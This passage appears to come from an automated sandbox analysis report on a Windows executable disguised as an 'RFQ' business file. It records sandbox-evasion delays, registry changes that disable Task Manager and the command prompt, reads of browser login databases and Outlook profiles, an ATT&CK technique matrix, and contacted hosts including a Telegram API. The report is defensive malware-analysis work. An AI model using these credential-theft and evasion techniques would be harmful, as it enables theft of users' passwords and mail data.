            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeMemory allocated: 36070000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 599407Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 599297Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 598688Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 598571Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 598297Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 598188Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 598063Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 597844Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 597719Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 595701Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 595576Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 595426Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 595077Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 594969Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 593985Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeWindow / User API: threadDelayed 6825Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeWindow / User API: threadDelayed 2998Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskEAE7.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeAPI coverage: 3.9 %
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -32281802128991695s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 2336Thread sleep count: 6825 > 30Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 2336Thread sleep count: 2998 > 30Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -599657s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -599532s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -599407s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -599297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -599188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -599063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -598938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -598813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -598688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -598571s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -598422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -598297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -598188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -598063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -597953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -597844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -597719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -597610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -597485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -597360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -597235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -597110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -596985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -596860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -596735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -596610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -596485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -596360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -596235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -596110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -595985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -595860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -595701s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -595576s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -595426s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -595297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -595188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -595077s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -594969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -594860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -594735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -594610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -594485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -594360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -594235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -594110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe TID: 4600Thread sleep time: -593985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405846
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_004027FB FindFirstFileW,4_2_004027FB
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_00406398 FindFirstFileW,FindClose,4_2_00406398
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 599407Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 599297Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 598688Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 598571Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 598297Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 598188Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 598063Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 597844Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 597719Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 595701Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 595576Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 595426Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 595077Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 594969Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeThread delayed: delay time: 593985Jump to behavior
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2972173714.0000000003B78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH<
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2972173714.0000000003BCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeAPI call chain: ExitProcess graph end nodegraph_0-3943
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeAPI call chain: ExitProcess graph end nodegraph_0-3762
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess created: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe "C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeQueries volume information: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406077
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RFQ December-January Forcast and TCL.exe PID: 2692, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RFQ December-January Forcast and TCL.exe PID: 2692, type: MEMORYSTR
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RFQ December-January Forcast and TCL.exe PID: 2692, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RFQ December-January Forcast and TCL.exe PID: 2692, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RFQ December-January Forcast and TCL.exe PID: 2692, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            RFQ December-January Forcast and TCL.exe30%VirustotalBrowse
            RFQ December-January Forcast and TCL.exe18%ReversingLabsWin32.Trojan.Generic
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nskEAE7.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nskEAE7.tmp\System.dll0%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.17.46
            truefalse
              high
              drive.usercontent.google.com
              172.217.17.65
              truefalse
                high
                reallyfreegeoip.org
                172.67.177.134
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    158.101.44.242
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
